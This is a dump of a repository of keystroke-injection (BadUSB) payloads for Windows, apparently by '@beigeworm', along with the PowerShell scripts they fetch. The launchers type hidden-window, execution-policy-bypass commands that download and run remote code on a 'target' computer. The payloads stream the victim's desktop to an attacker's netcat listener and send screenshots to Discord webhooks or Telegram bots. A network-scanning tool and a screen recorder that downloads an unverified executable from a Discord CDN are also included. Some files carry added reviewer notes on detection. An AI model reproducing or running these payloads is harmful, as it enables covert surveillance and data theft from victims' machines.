Sleep 10 14 | }while ($v -le 5) 15 | -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Screenshare/Desktop Screenshare over Netcat.js: -------------------------------------------------------------------------------- 1 | // Title: Beigeworm's Screenshare Through Netcat 2 | // Author: @beigeworm 3 | // Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace YOUR_IP_HERE with your netcat attacker IP Address. 7 | // Run script on target Windows system. 8 | // On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required) 9 | // Then in a firefox browser on the Linux box > http://localhost:8080 10 | 11 | // script setup 12 | layout("us") 13 | 14 | // Open Powershell and download script 15 | delay(1000); 16 | press("GUI r"); 17 | delay(1000); 18 | type("powershell -NoP -Ep Bypass -W H -C $ip='YOUR_IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Netcat-Screenshare/main.ps1 | iex"); 19 | delay(500); 20 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Screenshare/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Desktop Screenshare Over Netcat

3 | 4 | SYNOPSIS 5 | 6 | Starts a video stream of the desktop to a netcat session (the output is viewed in a browser.) 7 | 8 | USAGE 9 | 10 | Run script on target Windows system. 11 | On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 12 | Then in a firefox browser goto > http://localhost:8080 13 | 14 | (Firefox is the only browser that supports the codec for the video stream..) -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Screenshare/main.ps1: -------------------------------------------------------------------------------- 1 | $IP = "$ip" 2 | $PORT = "9000" 3 | 4 | while ($true){ 5 | try{ 6 | Add-Type -AssemblyName System.Windows.Forms 7 | [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream 8 | $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp) 9 | $socket.Connect($IP,$PORT) 10 | 11 | function SendResponse($sock, $string){ 12 | if ($sock.Connected){ 13 | $bytesSent = $sock.Send($string) 14 | if ( $bytesSent -eq -1 ){}}} 15 | 16 | function SendStrResponse($sock, $string){ 17 | if ($sock.Connected){ 18 | $bytesSent = $sock.Send( 19 | [text.Encoding]::Ascii.GetBytes($string)) 20 | if ( $bytesSent -eq -1 ){}}} 21 | 22 | function SendHeader([net.sockets.socket] $sock,$length,$statusCode = "200 OK",$mimeHeader="text/html",$httpVersion="HTTP/1.1"){ 23 | $response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n" 24 | SendStrResponse $sock $response} 25 | SendHeader $socket 26 | 27 | while ($True){ 28 | $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height) 29 | $g = [System.Drawing.Graphics]::FromImage($b) 30 | $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object 
System.Drawing.Point(0,0)), $b.Size) 31 | $g.Dispose() 32 | $MemoryStream.SetLength(0) 33 | $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg)) 34 | $b.Dispose() 35 | $length = $MemoryStream.Length 36 | [byte[]] $Bytes = $MemoryStream.ToArray() 37 | $str = "`n`n--boundary`n" + 38 | "Content-Type: image/jpeg`n" + 39 | "Content-Length: $length`n`n" 40 | SendStrResponse $socket $str 41 | SendResponse $socket $Bytes 42 | } 43 | $MemoryStream.Close() 44 | }catch{Write-Error $_}} 45 | 46 | -------------------------------------------------------------------------------- /Fast-Execution/Network-Enumeration-GUI/Network-Enumeration-GUI.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's LAN Device Enumeration GUI Tool. 2 | // Author: @beigeworm 3 | // Description: This script creates a GUI for enumerating devices on the local network. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Network-Enumeration-GUI/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Network-Enumeration-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Network Enumeration GUI

3 | 4 | SYNOPSIS 5 | 6 | This script creates a GUI window for enumerating devices on the local network. 7 | -------------------------------------------------------------------------------- /Fast-Execution/Network-Enumeration-GUI/main.ps1: --------------------------------------------------------------------------------

<#
====================== Mon's Network Enumeration Tool With GUI ==========================

SYNOPSIS
This script presents a GUI for enumerating other devices on the LAN.

USAGE
1. Run script with powershell
2. Input ip Range and select additional parameters
3. Press "Start Scan"

REVIEW NOTES (behaviour visible in the code below, for anyone triaging this script)
- "Start" launches one hidden ping.exe per address in the chosen range, then
  reads the local ARP cache with arp.exe -a.
- Results are written to $env:temp\Computers.csv; each optional step re-reads
  and re-writes that same file, and nothing in this script deletes it.
- Optional steps: a TCP connect to port 22 (2 s wait), a MAC vendor lookup that
  sends every discovered MAC address to https://api.macvendors.com/, and a DNS
  lookup via [System.Net.Dns]::GetHostEntry.
- The three text boxes are used without validation (see notes in the click handler).
#>

Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName Microsoft.VisualBasic
[System.Windows.Forms.Application]::EnableVisualStyles()

# Shared MouseHover handler: picks the tooltip text from the name of the
# control that raised the event ($this) and attaches it to that control.
$tooltip1 = New-Object System.Windows.Forms.ToolTip
$ShowHelp={
    Switch ($this.name) {


        "start" {$tip = "Start Search"}

        "ipsearch" {$tip = "Define the first part of the IP here"}

        "startrange" {$tip = "Define the start of the IP range"}

        # NOTE(review): this text repeats "start"; the control named "endrange"
        # is $endip, which holds the END of the range.
        "endrange" {$tip = "Define the start of the IP range"}

        "hostname" {$tip = "Try to resolve each IP's hostname"}

        "ssh" {$tip = "Test port 22 (ssh) on each IP"}

        "manufact" {$tip = "Get any manufacturer details"}
    }
    $tooltip1.SetToolTip($this,$tip)
}

# Main form.
$MainWindow = New-Object System.Windows.Forms.Form
$MainWindow.ClientSize = '552,535'
$MainWindow.Text = "| beigetools | LAN Device Search & Enumeration |"
$MainWindow.BackColor = "#242424"
$MainWindow.Opacity = 0.93
$MainWindow.TopMost = $false
$MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DevicePairingWizard.exe")

# Multiline results box; the click handler appends text to it.
$OutputBox = New-Object System.Windows.Forms.TextBox
$OutputBox.Multiline = $True;
$OutputBox.Location = New-Object System.Drawing.Size(15,180)
$OutputBox.Width = 522
$OutputBox.Height = 340
$OutputBox.Scrollbars = "Vertical"
$OutputBox.Text = "----------------------------------- RESULTS -----------------------------------"
$OutputBox.Font = 'Microsoft Sans Serif,8,style=Bold'

# "Start" button; its Click handler is registered further down.
$StartScan = New-Object System.Windows.Forms.Button
$StartScan.Text = "Start"
$StartScan.Width = 100
$StartScan.Height = 25
$StartScan.Location = New-Object System.Drawing.Point(435, 33)
$StartScan.Font = 'Microsoft Sans Serif,8,style=Bold'
$StartScan.BackColor = "#eeeeee"
$StartScan.add_MouseHover($showhelp)
$StartScan.name="start"

# Label + checkbox: enable the port 22 test.
$sshboxtext = New-Object System.Windows.Forms.Label
$sshboxtext.Text = "Test for SSH"
$sshboxtext.ForeColor = "#bcbcbc"
$sshboxtext.AutoSize = $true
$sshboxtext.Width = 25
$sshboxtext.Height = 10
$sshboxtext.Location = New-Object System.Drawing.Point(35, 67)
$sshboxtext.Font = 'Microsoft Sans Serif,8,style=Bold'

$sshbox = New-Object System.Windows.Forms.CheckBox
$sshbox.Width = 20
$sshbox.Height = 20
$sshbox.Location = New-Object System.Drawing.Point(15, 65)
$sshbox.add_MouseHover($showhelp)
$sshbox.name="ssh"

# Label + checkbox: enable the MAC vendor lookup.
$manufacturerboxtext = New-Object System.Windows.Forms.Label
$manufacturerboxtext.Text = "Include Manufacturer"
$manufacturerboxtext.ForeColor = "#bcbcbc"
$manufacturerboxtext.AutoSize = $true
$manufacturerboxtext.Width = 25
$manufacturerboxtext.Height = 10
$manufacturerboxtext.Location = New-Object System.Drawing.Point(35, 97)
$manufacturerboxtext.Font = 'Microsoft Sans Serif,8,style=Bold'

$manufacturerbox = New-Object System.Windows.Forms.CheckBox
$manufacturerbox.Width = 20
$manufacturerbox.Height = 20
$manufacturerbox.Location = New-Object System.Drawing.Point(15, 95)
$manufacturerbox.add_MouseHover($showhelp)
$manufacturerbox.name="manufact"

# Label + checkbox: enable the hostname lookup.
$hostnameboxtext = New-Object System.Windows.Forms.Label
$hostnameboxtext.Text = "Include Network Hostname"
$hostnameboxtext.ForeColor = "#bcbcbc"
$hostnameboxtext.AutoSize = $true
$hostnameboxtext.Width = 25
$hostnameboxtext.Height = 10
$hostnameboxtext.Location = New-Object System.Drawing.Point(35, 127)
$hostnameboxtext.Font = 'Microsoft Sans Serif,8,style=Bold'

$hostnamebox = New-Object System.Windows.Forms.CheckBox
$hostnamebox.Width = 20
$hostnamebox.Height = 20
$hostnamebox.Location = New-Object System.Drawing.Point(15, 125)
$hostnamebox.add_MouseHover($showhelp)
$hostnamebox.name="hostname"

$TextboxInputHeader = New-Object System.Windows.Forms.Label
$TextboxInputHeader.Text = "Search IP Range for All Devices"
$TextboxInputHeader.ForeColor = "#bcbcbc"
$TextboxInputHeader.AutoSize = $true
$TextboxInputHeader.Width = 25
$TextboxInputHeader.Height = 10
$TextboxInputHeader.Location = New-Object System.Drawing.Point(15, 15)
$TextboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold'

# Address prefix; the range value is appended to this text as-is.
$TextBoxInput = New-Object System.Windows.Forms.TextBox
$TextBoxInput.Location = New-Object System.Drawing.Point(15, 35)
$TextBoxInput.BackColor = "#eeeeee"
$TextBoxInput.Width = 140
$TextBoxInput.Height = 40
$TextBoxInput.Text = "192.168.0."
$TextBoxInput.Multiline = $false
$TextBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold'
$TextBoxInput.add_MouseHover($showhelp)
$TextBoxInput.name="ipsearch"

$dashline = New-Object System.Windows.Forms.Label
$dashline.Text = "-"
$dashline.ForeColor = "#bcbcbc"
$dashline.AutoSize = $true
$dashline.Width = 25
$dashline.Height = 10
$dashline.Location = New-Object System.Drawing.Point(220, 35)
$dashline.Font = 'Microsoft Sans Serif,9,style=Bold'

# First value of the range (default "1").
$startip = New-Object System.Windows.Forms.TextBox
$startip.Location = New-Object System.Drawing.Point(170, 35)
$startip.BackColor = "#eeeeee"
$startip.Width = 50
$startip.Height = 40
$startip.Text = "1"
$startip.Multiline = $false
$startip.Font = 'Microsoft Sans Serif,8,style=Bold'
$startip.add_MouseHover($showhelp)
$startip.name="startrange"

# Last value of the range (default "254").
$endip = New-Object System.Windows.Forms.TextBox
$endip.Location = New-Object System.Drawing.Point(230, 35)
$endip.BackColor = "#eeeeee"
$endip.Width = 50
$endip.Height = 40
$endip.Text = "254"
$endip.Multiline = $false
$endip.Font = 'Microsoft Sans Serif,8,style=Bold'
$endip.add_MouseHover($showhelp)
$endip.name="endrange"

#==================================================== Define GUI Elements ==========================================================

$MainWindow.controls.AddRange(@($TextBoxInput, $startip, $endip, $StartScan, $sshboxtext, $sshbox, $manufacturerboxtext, $manufacturerbox, $hostnameboxtext, $hostnamebox, $OutputBox, $TextboxInputHeader, $dashline))

#==================================================== Click Functions ==========================================================

$StartScan.Add_Click({

    # Appends one line to the results box and scrolls to it.
    Function Add-OutputBoxLine{
        Param ($outfeed)
        $OutputBox.AppendText("`r`n$outfeed")
        $OutputBox.Refresh()
        $OutputBox.ScrollToCaret()
    }
    Add-OutputBoxLine -Outfeed "Starting scan..."

    # NOTE(review): none of the three text boxes is validated. The [int] casts
    # fail on non-numeric text, and $Subnet is placed unmodified into the
    # ping.exe argument string and into the Select-String pattern below (which
    # is a regular expression, so the dots in the prefix match any character).
    $FileOut = "$env:temp\Computers.csv"
    $Subnet = $TextBoxInput.Text
    $a=[int]$startip.text
    $b=[int]$endip.text

    # One hidden ping.exe per address: one echo request, 0-byte payload,
    # don't-fragment set, TTL 2, 100 ms timeout, IPv4 only. Start-Process is
    # called without -Wait, so with the default 1-254 range this appears in
    # process-creation telemetry as a burst of ping.exe children of this
    # PowerShell process, and arp.exe below may run before they have finished.
    $a..$b|ForEach-Object{
        Start-Process -WindowStyle Hidden ping.exe -Argumentlist "-n 1 -l 0 -f -i 2 -w 100 -4 $SubNet$_"
    }
    # Keep ARP cache lines that match the prefix followed by "dynam"
    # (presumably the "dynamic" type column of English-locale output - TODO
    # confirm), turn runs of spaces into commas so each line parses as CSV,
    # and keep only the IPv4 and MAC columns.
    $Computers = (arp.exe -a | Select-String "$SubNet.*dynam") -replace ' +',','|
        ConvertFrom-Csv -Header Computername,IPv4,MAC,x,Vendor|
        Select IPv4,MAC
    $Computers | Export-Csv $FileOut -NotypeInformation

    if($sshbox.Checked){

        # Adds an "ssh" column: "Yes" when the connect to port 22 completes
        # within the wait, "No" when the wait times out, "Closed" when anything
        # in the try block throws.
        $data = Import-Csv "$env:temp\Computers.csv"
        $data | Add-Member -MemberType NoteProperty -Name "ssh" -Value ""
        $data | ForEach-Object {
            $ip = $_.'IPv4'
            try {
                $tcpClient = New-Object System.Net.Sockets.TcpClient
                $timeout = 2 * 1000 # 2 seconds timeout
                $asyncResult = $tcpClient.BeginConnect($ip, 22, $null, $null)
                $wait = $asyncResult.AsyncWaitHandle.WaitOne($timeout, $false)
                if ($wait) {
                    $tcpClient.EndConnect($asyncResult)
                    $ssh = "Yes"
                } else {
                    $ssh = "No"
                }
                # NOTE(review): Close() is skipped when the try block throws.
                $tcpClient.Close()
            } catch {
                $ssh = "Closed"
            }
            $_ | Add-Member -MemberType NoteProperty -Name "ssh" -Value $ssh -force
        }
        $data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation
    }

    if($manufacturerbox.Checked){

        # Adds a "manufacturer" column from a third-party web API.
        # NOTE(review): every MAC address found on the local network is sent to
        # api.macvendors.com, one request per second. Unlike the other two
        # steps, this request is not wrapped in try/catch.
        $data = Import-Csv "$env:temp\Computers.csv"
        $data | Add-Member -MemberType NoteProperty -Name "manufacturer" -Value ""
        $data | ForEach-Object {

            $mac = $_.'MAC'
            $apiUrl = "https://api.macvendors.com/" + $mac
            $manufacturer = (Invoke-WebRequest -Uri $apiUrl).Content
            start-sleep 1
            $_ | Add-Member -MemberType NoteProperty -Name "manufacturer" -Value $manufacturer -force
        }
        $data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation
    }


    if($hostnamebox.Checked){

        # Adds a "Hostname" column using a DNS lookup per address.
        $data = Import-Csv "$env:temp\Computers.csv"
        $data | Add-Member -MemberType NoteProperty -Name "Hostname" -Value ""
        $data | ForEach-Object {
            try{
                $ip = $_.'IPv4'
                $hostname = ([System.Net.Dns]::GetHostEntry($ip)).HostName
                $_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value $hostname -force
            } catch{
                # NOTE(review): inside catch, $_ is the error record (the same
                # line reads .Exception.Message from it), so this Add-Member
                # appears to target the error object, not the CSV row; the row
                # keeps the empty "Hostname" value added above.
                $_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value "Error: $($_.Exception.Message)"
            }
        }
        $data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation
    }

    # Show the final CSV text in the results box; the file stays in %TEMP%.
    $textfile = Get-Content "$env:temp\Computers.csv" -Raw

    Add-OutputBoxLine -Outfeed "$textfile"

})

#===================================================== Initialize Script ===================================================

$MainWindow.ShowDialog() | Out-Null
exit
-------------------------------------------------------------------------------- /Fast-Execution/Record-Screen-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screen Recorder GUI

3 | 4 | SYNOPSIS 5 | 6 | A customizable gui for screen recording with ffmpeg.exe 7 | 8 | USAGE 9 | 10 | 1. Run script. 11 | 2. in GUI click 'Get ffmpeg.exe' 12 | 3. input desired variables and click start 13 | 4. Timestamped output file will be in the same folder as the script. 14 | -------------------------------------------------------------------------------- /Fast-Execution/Record-Screen-GUI/Record-Screen-GUI.js: --------------------------------------------------------------------------------
// Title: beigeworm's Screen Recorder GUI Tool.
// Author: @beigeworm
// Description: This script creates a GUI window for recording the screen to .mkv file.
// Target: Windows 10
//
// Review notes (what the keystrokes below amount to on the host):
//  - The Run dialog is opened and a single PowerShell command line is typed
//    into it, so nothing is written to disk by this launcher itself.
//  - The command uses -NoP (no profile), -Ep Bypass (execution policy
//    bypass) and -W H (hidden window), then pipes the text returned by irm
//    (Invoke-RestMethod) into iex (Invoke-Expression).
//  - The script is fetched from the `main` branch of a repository at run
//    time, with no pinned revision and no integrity check, so what executes
//    is whatever that URL serves at that moment.
//  - For detection, the combination of those flags with `irm ... | iex` in a
//    powershell.exe command line started from the Run dialog is the
//    observable event.

// script setup
layout("us")

// Open Powershell and download script
delay(1000);
press("GUI r");
delay(1000);
type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Record-Screen-GUI/main.ps1 | iex");
delay(500);
press("ENTER");

-------------------------------------------------------------------------------- /Fast-Execution/Record-Screen-GUI/Record-Screen-GUI.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Screen Recorder GUI Tool. 2 | REM Author: @beigeworm 3 | REM Description: This script creates a GUI window for recording the screen to .mkv file. 
4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Record-Screen-GUI/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Fast-Execution/Record-Screen-GUI/main.ps1: --------------------------------------------------------------------------------
# Screen recorder GUI: a WinForms window with five text boxes and three
# buttons that download ffmpeg.exe to %TEMP%, check for it, and run it with
# the gdigrab input to record the desktop to Clip_<timestamp>.mkv.
#
# Review notes (behaviour visible in this file):
#  - The first three statements hide the PowerShell console window.
#  - "Get ffmpeg.exe" saves an executable from a hard-coded Discord CDN
#    attachment URL to $env:Temp\ffmpeg.exe and "Start" runs that file; there
#    is no hash or signature check in between.
#  - "Start" does not read the text boxes (see note in that handler).

# P/Invoke user32!ShowWindow and call it on this process's main window with
# state 0 (SW_HIDE), which hides the console window.
$Import = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
add-type -name win -member $Import -namespace native;
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);

Add-Type -AssemblyName System.Windows.Forms
$form = New-Object Windows.Forms.Form
$form.Text = " BeigeTools | Screen Recorder "
$form.Font = 'Microsoft Sans Serif,12,style=Bold'
$form.Size = New-Object Drawing.Size(350, 200)
$form.StartPosition = 'Manual'
$form.BackColor = [System.Drawing.Color]::Black
$form.ForeColor = [System.Drawing.Color]::White
$form.FormBorderStyle = [System.Windows.Forms.FormBorderStyle]::FixedDialog

# Framerate: caption, unit label and text box (default "25").
$Text = New-Object Windows.Forms.Label
$Text.Text = "Framerate"
$Text.AutoSize = $true
$Text.Font = 'Microsoft Sans Serif,10'
$Text.Location = New-Object System.Drawing.Point(15, 20)
$fps = New-Object Windows.Forms.Label
$fps.Text = "fps"
$fps.AutoSize = $true
$fps.Font = 'Microsoft Sans Serif,10'
$fps.Location = New-Object System.Drawing.Point(60, 40)

$frBox = New-Object System.Windows.Forms.TextBox
$frBox.Location = New-Object System.Drawing.Point(18, 40)
$frBox.BackColor = "#eeeeee"
$frBox.Width = 40
$frBox.Text = "25"
$frBox.Multiline = $false
$frBox.Font = 'Microsoft Sans Serif,8,style=Bold'

# Record time: caption, unit label and text box (default "30").
$Text2 = New-Object Windows.Forms.Label
$Text2.Text = "Record Time"
$Text2.Font = 'Microsoft Sans Serif,10'
$Text2.AutoSize = $true
$Text2.Location = New-Object System.Drawing.Point(120, 20)
$sec = New-Object Windows.Forms.Label
$sec.Text = "s"
$sec.AutoSize = $true
$sec.Font = 'Microsoft Sans Serif,10'
$sec.Location = New-Object System.Drawing.Point(165, 40)

$tBox = New-Object System.Windows.Forms.TextBox
$tBox.Location = New-Object System.Drawing.Point(123, 40)
$tBox.BackColor = "#eeeeee"
$tBox.Width = 40
$tBox.Text = "30"
$tBox.Multiline = $false
$tBox.Font = 'Microsoft Sans Serif,8,style=Bold'

# Capture offset X: caption, unit label and text box (default "0").
$Text3 = New-Object Windows.Forms.Label
$Text3.Text = "Offset X"
$Text3.Font = 'Microsoft Sans Serif,10'
$Text3.AutoSize = $true
$Text3.Location = New-Object System.Drawing.Point(15, 70)
$ofx = New-Object Windows.Forms.Label
$ofx.Text = "px"
$ofx.AutoSize = $true
$ofx.Font = 'Microsoft Sans Serif,10'
$ofx.Location = New-Object System.Drawing.Point(60, 90)

$oxBox = New-Object System.Windows.Forms.TextBox
$oxBox.Location = New-Object System.Drawing.Point(18, 90)
$oxBox.BackColor = "#eeeeee"
$oxBox.Width = 40
$oxBox.Text = "0"
$oxBox.Multiline = $false
$oxBox.Font = 'Microsoft Sans Serif,8,style=Bold'

# Capture offset Y: caption, unit label and text box (default "0").
$Text4 = New-Object Windows.Forms.Label
$Text4.Text = "Offset Y"
$Text4.Font = 'Microsoft Sans Serif,10'
$Text4.AutoSize = $true
$Text4.Location = New-Object System.Drawing.Point(120, 70)
$ofy = New-Object Windows.Forms.Label
$ofy.Text = "px"
$ofy.AutoSize = $true
$ofy.Font = 'Microsoft Sans Serif,10'
$ofy.Location = New-Object System.Drawing.Point(165, 90)

$oyBox = New-Object System.Windows.Forms.TextBox
$oyBox.Location = New-Object System.Drawing.Point(123, 90)
$oyBox.BackColor = "#eeeeee"
$oyBox.Width = 40
$oyBox.Text = "0"
$oyBox.Multiline = $false
$oyBox.Font = 'Microsoft Sans Serif,8,style=Bold'

# Video size: caption and text box (default "1920x1080").
$Text5 = New-Object Windows.Forms.Label
$Text5.Text = "Video Size"
$Text5.Font = 'Microsoft Sans Serif,10'
$Text5.AutoSize = $true
$Text5.Location = New-Object System.Drawing.Point(15, 120)

$vsBox = New-Object System.Windows.Forms.TextBox
$vsBox.Location = New-Object System.Drawing.Point(18, 140)
$vsBox.BackColor = "#eeeeee"
$vsBox.Width = 140
$vsBox.Text = "1920x1080"
$vsBox.Multiline = $false
$vsBox.Font = 'Microsoft Sans Serif,8,style=Bold'

# The three action buttons.
$Download = New-Object Windows.Forms.Button
$Download.Text = "Get ffmpeg.exe"
$Download.Width = 120
$Download.Height = 30
$Download.BackColor = [System.Drawing.Color]::White
$Download.ForeColor = [System.Drawing.Color]::Black
$Download.Location = New-Object System.Drawing.Point(210, 50)
$Download.Font = 'Microsoft Sans Serif,10,style=Bold'

$Check = New-Object Windows.Forms.Button
$Check.Text = "Check Files"
$Check.Width = 120
$Check.Height = 30
$Check.BackColor = [System.Drawing.Color]::White
$Check.ForeColor = [System.Drawing.Color]::Black
$Check.Location = New-Object System.Drawing.Point(210, 90)
$Check.Font = 'Microsoft Sans Serif,10,style=Bold'

$startrecord = New-Object Windows.Forms.Button
$startrecord.Text = "Start"
$startrecord.Width = 120
$startrecord.Height = 30
$startrecord.BackColor = [System.Drawing.Color]::White
$startrecord.ForeColor = [System.Drawing.Color]::Black
$startrecord.Location = New-Object System.Drawing.Point(210, 130)
$startrecord.Font = 'Microsoft Sans Serif,10,style=Bold'

$form.Controls.AddRange(@($Text,$fps,$frBox,$Text2,$sec,$tbox,$Text3,$ofx,$oxBox,$Text4,$ofy,$oyBox,$Text5,$vsBox,$Download,$Check,$startrecord))


# Downloads ffmpeg.exe to %TEMP% unless a file of that name already exists.
# NOTE(review): the binary comes from a Discord CDN attachment, not from the
# ffmpeg project, and is later executed without any hash or signature
# verification. Because an existing file is reused, whatever is already at
# $env:Temp\ffmpeg.exe is what "Start" will run.
$Download.Add_Click{
    $Path = "$env:Temp\ffmpeg.exe"
    If (!(Test-Path $Path)){
        $url = "https://cdn.discordapp.com/attachments/803285521908236328/1089995848223555764/ffmpeg.exe"
        iwr -Uri $url -OutFile $Path
    }
}

# Reports through msg.exe whether $env:Temp\ffmpeg.exe exists.
$Check.Add_Click{
    $Path = "$env:Temp\ffmpeg.exe"
    If (!(Test-Path $Path)){msg.exe * 'Not Installed'}
    else {msg.exe * 'Installed'}
}

# Runs ffmpeg with the gdigrab input against "desktop" and writes
# Clip_<yyyyMMdd-HHmmss>.mkv to a relative path, i.e. the process's current
# directory.
$startrecord.Add_Click{
    $timestamp = Get-Date -Format "yyyyMMdd-HHmmss"
    $mkvPath = "Clip_$timestamp.mkv"

    # NOTE(review): $t, $fr, $ox, $oy and $vs are not assigned anywhere in
    # this file, and the text boxes ($tBox, $frBox, $oxBox, $oyBox, $vsBox)
    # are never read here, so as written these defaults apply regardless of
    # what is typed in the GUI - unless the calling session defines those
    # variables. The duration default here (10) also differs from the value
    # shown in the text box ("30").
    if ($t.Length -eq 0){$t = 10}
    if ($fr.Length -eq 0){$fr = 25}
    if ($ox.Length -eq 0){$ox = 0}
    if ($oy.Length -eq 0){$oy = 0}
    if ($vs.Length -eq 0){$vs = "1920x1080"}

    .$env:Temp\ffmpeg.exe -f gdigrab -framerate $fr -t $t -offset_x $ox -offset_y $oy -video_size $vs -show_region 1 -i desktop $mkvPath
}

$form.ShowDialog()
-------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screenshot to Discord

3 | 4 | SYNOPSIS 5 | 6 | Takes a screenshot of the desktop and posts to a discord webhook. 7 | 8 | SETUP 9 | 10 | 1. replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 11 | -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Discord/Screenshot-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: Screenshot to discord webhook 2 | // Author: @beigeworm 3 | // Description: This script takes a screenshot of the desktop and posts to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_sc_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Discord/main.ps1: --------------------------------------------------------------------------------
# Captures the whole virtual screen to a PNG in %TEMP%, uploads it with
# curl.exe to the URL held in $dc, then deletes the PNG.
#
# Review notes (observable behaviour, for triage and detection):
#  - $dc is not set in this file; the launcher shown on this page assigns it
#    on the same command line before piping this script into iex.
#  - Artefacts: a short-lived $env:temp\SC.png, and a curl.exe child process
#    whose command line contains both that path and the destination URL.
#  - With $a = 1 the loop body runs once, but the script still sleeps
#    $seconds (30) after the upload before it exits.
$hookurl = "$dc"
$seconds = 30 # Screenshot interval
$a = 1 # Screenshot amount

While ($a -gt 0){
    $Filett = "$env:temp\SC.png"
    Add-Type -AssemblyName System.Windows.Forms
    Add-type -AssemblyName System.Drawing
    # VirtualScreen is the bounding rectangle of all monitors, so the capture
    # covers every display, not only the primary one.
    $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $Width = $Screen.Width
    $Height = $Screen.Height
    $Left = $Screen.Left
    $Top = $Screen.Top
    $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
    $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
    $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
    $bitmap.Save($Filett, [System.Drawing.Imaging.ImageFormat]::png)
    Start-Sleep 1
    # Multipart form upload of the PNG as field "file1".
    curl.exe -F "file1=@$filett" $hookurl
    Start-Sleep 1
    # The PNG is removed after upload, so it only exists for a few seconds.
    Remove-Item -Path $filett
    Start-Sleep $seconds
    $a--
}

-------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Telegram/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screenshot to Telegram

3 | 4 | SYNOPSIS 5 | 6 | Takes a screenshot of the desktop and posts to a Telegram bot chat. 7 | 8 | SETUP 9 | 10 | 1. replace TELEGRAM_TOKEN_HERE with your Telegram token. 11 | -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Telegram/Screenshot-to-Telegram.js: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Screenshot to Telegram Bot Chat 3 | REM Author: @beigeworm 4 | REM Description: This script takes a screenshot of the desktop and posts to a Telegram Bot Chat. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace TELEGRAM_TOKEN_HERE with your Telegram Token. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove "-W H" to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Screen-to-Telegram/main.ps1 | iex 18 | ENTER 19 | 20 | // script setup 21 | layout("us") 22 | 23 | // Open Powershell and download script 24 | delay(1000); 25 | press("GUI r"); 26 | delay(1000); 